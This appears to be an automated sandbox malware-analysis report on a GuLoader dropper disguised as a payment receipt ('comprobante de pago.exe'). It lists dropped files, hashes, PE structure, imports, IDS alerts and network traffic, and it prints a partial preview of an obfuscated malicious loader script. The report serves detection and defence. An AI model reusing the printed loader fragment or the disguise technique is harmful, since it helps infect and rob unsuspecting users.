Preview:	uuuuuuyuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuauu%.uuuuuuuu.u.uuuguuuuuuuuuuuuuuuuuuuuuuuuUuuuuuuuuuuOuuDuuuuuuuuuuuuuuu.uuuu.uuuuuubuuuukuuuuuuuuuuuuuuuduuuuuuuu}uuuuuuuu.uuuuuuuuuuuv.uuuuuuuuufuu.uuuuuuuuuuuuuu.uuuuuuuu~uuuuuu.uuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuu.uuuuu.uuu.uuuuu.uuuuuuuuuuuuuuuuuuuuuuu.uuu.uuuuuuuuuuuuuuu&uuu.uuu.uuuuuuuuuu.uuuuuuuuuu.uuu.uuuuuuu7uuuuu.uuuuuuuuuuuuuuuuHuuuuuRuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu/uuuuuuuuuuK.u.Huuuuuuuuuuuuuuuuuuuuu.uuuuuuu.uu.u#uuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuu.uuuuuuuuuuuuuu.uuuuuuuuuu.uuuuuuuuuuuu}uuuuuuuuu.uuuuuuuuuuu.uuuuuuuu.uuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuhu.uuuuuuuuu..uuuuu.uuuuuuuuuuuuu.uuu.uuuuuuuuuuuuu.uuuuuuuuuuuuuu.uuuuu.uuuuuu.uuuuuuuuuuuuuuuuuuuuuBuuuuu3uuuuuuuuuu.u.uuuuuuuuu.uuuuuuuu.uIuuuuuuuuuuuu.uuu.uuuuuuuu.$.uuuuuuuuuuuuuuLuuuuuuuuuuuuuuuuuuuuuu"uu=uuuuuuuu.uuuuuuu.uu.uuuuuuuuuuuuuuuuuuuuuuuu.uuuuu.u.uuu.uuuuuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuu.u.uuuuuuuuuuuu.uuuuuuuuuuuuu.uuuuuuuuuuu.uuuuuuu

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3287), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	53232
Entropy (8bit):	5.306622026877424
Encrypted:	false
SSDEEP:	768:iPi38zuk1tqO6kIRVOfsWD1psa71w+Mig6SR2hCWmm4oOr7G0ugpS12n:MAOlrJAOUCfj1w/ig6SR2uqOrbb
MD5:	550953A2F63ED2B48EBF6F76343105DC
SHA1:	F9425CAFC739B32C655B05AFDF9A5930337F2A54
SHA-256:	F4C99919EAF75B521F3E08EC3E4378CC546A07DE51735E48D7CF9110A4AFEC3C
SHA-512:	956BB1F66503873A3B721875123C485CA47E7F9F9CE14CE451A2A4B0F1C705B40774AC1569BDB41E83758E880586E1F7740598B3112744E0B68720AE4E0DEAB3
Malicious:	true
Preview:	$Facon=$Viste;........$Comped = @'.,yrsk. Kons$ metaE Gim,rMejeml Vandi ulpnRef rsAntev=Evadt$UsselM H,tcy Ung lC,ratdFonderSuppleRinkntTopcoi,insedReb cs KurvtGeni rWhencaSkidtfP eudi Ign kNonvakAfbeseDatannAl hu; agtv.TogstfTortiugr venCyclicRammetChikai SammoB skrn M,sk Pho aCo,ntrTall bArmate Sadojsti vd RecisNonalmSgn,di,nuden Tendi Bol.s Af lt Orphedeepmr L gniSaintePhoebrmedianU orueS mmesK,ska W cks(Tuesi$PiratPamouryRaa,flHjvanoGrandrtribuir gersMorgetstokkePr.ssnHelikoTeasasRootwiAfs nsKnick,Brnel$cha,tPSnottnDemo eFiguru sk rmudskioH emmnGabbioUnlo p aphee nterxUnconyHoved) Samd Husm{Godtg.masku.Egen $CagotV pat a,ylerrDosinmafstreGreenm rediaReubeaGene.l AnsteTorqurLucke Hom g(FreelLP ivaes.lidjOve leBicams nativGopheeFlersntykmld rage Umrke'.skerBDeflerSmaa,oOksehlOutecg.onde$lose S S ifkBudd rB,stvmNephr I akPGalva FredsMA baneLoz.ntLrerraSmaaty rigF smukuCowor. Fod,zGrnsaeSengelOstenOOtx,rvchaete Distr rancsIndbeoOverpDHousei Agersfibonc hustoHuzvar Konf Kjo P S p

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\regenereringens.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 641x75, components 3
Category:	dropped
Size (bytes):	11812
Entropy (8bit):	7.947325095143734
Encrypted:	false
SSDEEP:	192:LGpB8H5FjyifoM3ips5StnIq5fssf6MNZwNCa0x0mGKZXdS1+mRV4SFMlfGC:yp6H59yifX3LgqAlLNZwNe0mdc1+mkDn
MD5:	8145D5AFF0B7E710F7722BFBC4D642C3
SHA1:	AB79D97123A77B690671BDC5E177F6C34EB0686E
SHA-256:	EBEEB3C90990DEF0715C7AD916086760B7A48A3C68D927B72A6706BFC848D4DD
SHA-512:	39153A6B32E0B89EDA8A4EAC26058AFBA0DC94306DCAF94BD9D1D95BBAC12200F08CAA493B8394A0F0FD8CDF96F2812657DB65EAE814B3593B9F5AEC81B10D42
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......K...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..x...XI.sk\|...t....>.":5.z.a.\..+...u...?k..o..8L=k.jI..K...../k..o.../..\............p:.<z.}.z.6ut..).XO.T.b.q...=h.H..X....i...K.S..gU...G.G.rG\Q.T....~.Iu.3..H...H..8....O......=....G.'.G.q..'...G.$...__..9Y.}.}h.@..7.}?.?:p....../...>Vv>x....r.....T..F...X.Of.Vt.u'.+.]]..T.+p.h......R...d.A?.?:i....U...XwF..=i\|..X/.2..k...T+.A.<.....*..71.3..'4.t:Q .....

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\snild.txt

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	Generic INItialization configuration [OVERSLIPPED PACHYEMIA]
Category:	dropped
Size (bytes):	448
Entropy (8bit):	4.841570690161402
Encrypted:	false
SSDEEP:	12:xE/+SCPMQ6a1fDgy0iJEVqr2bMRJFv+8OgdDthj:jD6KrcimIzRJF2gHN
MD5:	CB0C5EAA7082E8658634531A5EEF4F58
SHA1:	6C1D5FA90EF28530E4BCFF744F3E27D035AD3194
SHA-256:	67553983E0385E5F132B85DA91C15F164A275409FBAE5AF892B673CE9CBE350E
SHA-512:	CE507F3953B0C20C520949AC3C2D68A7FA19540C1E1739BE0B03B395790093E1E80FF0DA03C43098DCF11763AE16DDFB43B4972354E40CCAC7EE9E7E826D42B1
Malicious:	false
Preview:	;copa sporvognskonduktrerne monosporangium,lithotritic endothelium kasseapparater bowstringed counterpoised prerejection ompolstring..;miljberedskabs milty trakkasseriet hypotrochanteric bronzemedaljens udledningen dementerings,phagosome jacarandi tituleringer..;streeking aabenbaringen betalingsreglerne tewly,twiddler karneval vrdsttelserne expatiates..[overstregedes netvrksadressens]..[OVERSLIPPED PACHYEMIA]..[UBETVIVLELIGE PALEOHERPETOLOGY]..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\stdigeres.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 545x413, components 3
Category:	dropped
Size (bytes):	45620
Entropy (8bit):	7.975333434532706
Encrypted:	false
SSDEEP:	768:nmALp0uizgmT9hS9AsMXOpkOiaeOGaw7llfIzB9uFIF5yquPzSl1mD8Q8aq3dokh:nmICuiMG9hSKsGOJxlw7TQzB9uOF5JtN
MD5:	AFE667F9D1B6CA9E79E0F69C40EECCA9
SHA1:	6CCEA85C9A24086A0E44A3B2D18CDD55AC523DFD
SHA-256:	73B6E7E2168C91F3C91CB3FCC2B1C877404B6BC37F9C78DBCB91182BA6C51776
SHA-512:	8E7351D9DD61999FD333A5E859D27D3D5CC37800E5BBC2CAE300470E5BA6E06512EA012D26147A66082AA9CF8803E759277900E03AB3FFBDCA13CDEEB8BCC815
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........!.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..a`.H.=A.f].9".........`....6dT....\|.......i ..@Q..Q.[....N...#..qG.5..... (.....Y.m..9.E....=.Y..P..E`.J.5PZ...E:4d..5.&q.B.._cg.....dPq@....H..Z.?.>..=3S.E.d.x'..S..U._r..$[..{T......E..85R....m.'C.=*...<R....j`.p.......p0Z.3.Uk......).t.....]\........b^An.........u.I.....a..c5=.......o $.m.....Zrh..Y.n..I.H.#.....Z."K...t._.)Y..+.?D.Y.w.L.e.d..a..

C:\Users\user\AppData\Local\Temp\nskE3BF.tmp

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	1360248
Entropy (8bit):	5.594168097631149
Encrypted:	false
SSDEEP:	12288:Ca7FK6//h54f1NzE6B6Kwhv4IjNhOJbJt00jrIkhC6rlAyH:TFjpwI66Kev4IjNhOJbz00PIkhbhAyH
MD5:	E5BFE78E851ACF3BD2CA398D1540A87D
SHA1:	9B2D4FF8A576BA82E7B5CBBCE9E965EE31937D72
SHA-256:	45FE08F70601525440A2EA2A245A9A176A899CF607F687D2D8B641D3825AC710
SHA-512:	48620707B69F86E75DDF0741FAB36CCD44B4F05A294BD83AD227F8971787FBBE2DBC63C315D6171AE0E6DD02661B18C58D76716448B0B015DA34D45FD8C8083C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nskE3BF.tmp, Author: Joe Security
Preview:	.+......,...................M...H.......(+.......+..........................................................................................................................................................................................................................................G...U...........a...j...............................................................................................................................`.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.574745660362048
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	comprobante de pago.exe
File size:	839'098 bytes
MD5:	969da5cc61a21e2d5fd00a52254ecd8e
SHA1:	3f3cb9fdf47343f8e4d88e5171ad3b57ed6c4bad
SHA256:	20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18
SHA512:	6df74d8e45b5db927d8962e453f379b18ba79dce91a8e0677b55a36c1a57f38c43f677091d280d1abcbcad2b214299aeb02f2784047411e2d62a6e0912556e60
SSDEEP:	12288:1gP0I82X5K+GDnvy1eSLR0lUEkyZtyj6ittqTH3oEuprboHlExvyBBApy2HIxod3:EFJsDnylcpZk64oYEGc+yTARioCLC
TLSH:	B905126536C880D6C7A672FE79B3C7A29B16BC90E916E60733407A1F3E31255B607362
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@

File Icon


Icon Hash:	9c3e3b7b3f070643

Static PE Info

General

Entrypoint:	0x4033b6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57017AB0 [Sun Apr 3 20:18:56 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4ea4df5d94204fc550be1874e1b77ea7

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007FA1B4F71573h
push ebx
call 00007FA1B4F746CCh
cmp eax, ebx
je 00007FA1B4F71569h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007FA1B4F74646h
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FA1B4F7154Ch
push ebp
push 00000009h
call 00007FA1B4F7469Eh
push 00000007h
call 00007FA1B4F74697h
mov dword ptr [0042A244h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [0042A2F8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h
push 00429240h
call 00007FA1B4F74280h
call dword ptr [004080ACh]
mov ebp, 00435000h
push eax
push ebp
call 00007FA1B4F7426Eh
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x41000	0x21160	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x615d	0x6200	c5c0065fc4c103ac2469dafdce131fb4	False	0.6616709183673469	data	6.45041359169741	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x13a4	0x1400	4ac891d4ddf58633f14436f9f80ac6b6	False	0.4529296875	data	5.163001655755973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	66b45fceba0f24d768fb09e0afe23c99	False	0.5026041666666666	data	3.9824009583068882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x16000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x41000	0x21160	0x21200	4d9f3e7db420ea387e39c8c514b9bfcc	False	0.33696196933962264	data	3.4012038863124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x413a0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2978084703655507
RT_ICON	0x51bc8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.3537430683918669
RT_ICON	0x57050	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.3423476617855456
RT_ICON	0x5b278	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.387448132780083
RT_ICON	0x5d820	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.39892120075046905
RT_ICON	0x5e8c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5002665245202559
RT_ICON	0x5f770	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.46885245901639344
RT_ICON	0x600f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.48826714801444043
RT_ICON	0x609a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.4441244239631336
RT_ICON	0x61068	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.305635838150289
RT_ICON	0x615d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5274822695035462
RT_DIALOG	0x61a38	0x100	data	English	United States	0.5234375
RT_DIALOG	0x61b38	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x61c58	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x61d20	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x61d80	0xa0	data	English	United States	0.64375
RT_MANIFEST	0x61e20	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-12T12:41:36.091791+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49706	142.250.185.110	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2025 12:40:51.329442024 CET	49695	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:40:51.329485893 CET	443	49695	142.250.185.110	192.168.2.8
Mar 12, 2025 12:40:51.329566956 CET	49695	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:40:51.339036942 CET	49695	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:40:51.339066982 CET	443	49695	142.250.185.110	192.168.2.8
Mar 12, 2025 12:40:59.870805979 CET	443	49695	142.250.185.110	192.168.2.8
Mar 12, 2025 12:40:59.870918036 CET	49695	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:40:59.871033907 CET	49695	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:40:59.871052980 CET	443	49695	142.250.185.110	192.168.2.8
Mar 12, 2025 12:40:59.871709108 CET	49698	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:40:59.871752977 CET	443	49698	142.250.185.110	192.168.2.8
Mar 12, 2025 12:40:59.871826887 CET	49698	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:40:59.872107983 CET	49698	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:40:59.872123003 CET	443	49698	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:08.269516945 CET	443	49698	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:08.269670963 CET	49698	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.269752026 CET	49698	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.269774914 CET	443	49698	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:08.270426035 CET	49700	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.270469904 CET	443	49700	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:08.270555019 CET	49700	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.270603895 CET	49700	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.270656109 CET	443	49700	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:08.270725965 CET	49700	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.378796101 CET	49701	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.378844023 CET	443	49701	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:08.378999949 CET	49701	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.379643917 CET	49701	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:08.379656076 CET	443	49701	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:16.443767071 CET	443	49701	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:16.443906069 CET	49701	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:16.445930004 CET	49701	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:16.445955038 CET	443	49701	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:16.446731091 CET	49703	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:16.446783066 CET	443	49703	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:16.446870089 CET	49703	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:16.447110891 CET	49703	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:16.447125912 CET	443	49703	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:31.444840908 CET	443	49703	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:31.444969893 CET	49703	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.445065022 CET	49703	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.445095062 CET	443	49703	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:31.455878019 CET	49704	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.455924988 CET	443	49704	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:31.456006050 CET	49704	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.456103086 CET	49704	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.456140995 CET	443	49704	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:31.456183910 CET	49704	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.565748930 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.565814018 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:31.565937042 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.566236019 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:31.566253901 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:35.286292076 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:35.286427021 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:35.287312984 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:35.287383080 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:35.343080044 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:35.343110085 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:35.343482971 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:35.343570948 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:35.347548962 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:35.388328075 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:36.091845989 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:36.091928005 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:36.091932058 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:36.091969967 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:36.092143059 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:36.092173100 CET	443	49706	142.250.185.110	192.168.2.8
Mar 12, 2025 12:41:36.092185020 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:36.092215061 CET	49706	443	192.168.2.8	142.250.185.110
Mar 12, 2025 12:41:36.121475935 CET	49707	443	192.168.2.8	142.250.185.97
Mar 12, 2025 12:41:36.121511936 CET	443	49707	142.250.185.97	192.168.2.8
Mar 12, 2025 12:41:36.121587038 CET	49707	443	192.168.2.8	142.250.185.97
Mar 12, 2025 12:41:36.121931076 CET	49707	443	192.168.2.8	142.250.185.97
Mar 12, 2025 12:41:36.121948957 CET	443	49707	142.250.185.97	192.168.2.8
Mar 12, 2025 12:41:38.074698925 CET	443	49707	142.250.185.97	192.168.2.8
Mar 12, 2025 12:41:38.074825048 CET	49707	443	192.168.2.8	142.250.185.97
Mar 12, 2025 12:41:38.079763889 CET	49707	443	192.168.2.8	142.250.185.97
Mar 12, 2025 12:41:38.079770088 CET	443	49707	142.250.185.97	192.168.2.8
Mar 12, 2025 12:41:38.080176115 CET	443	49707	142.250.185.97	192.168.2.8
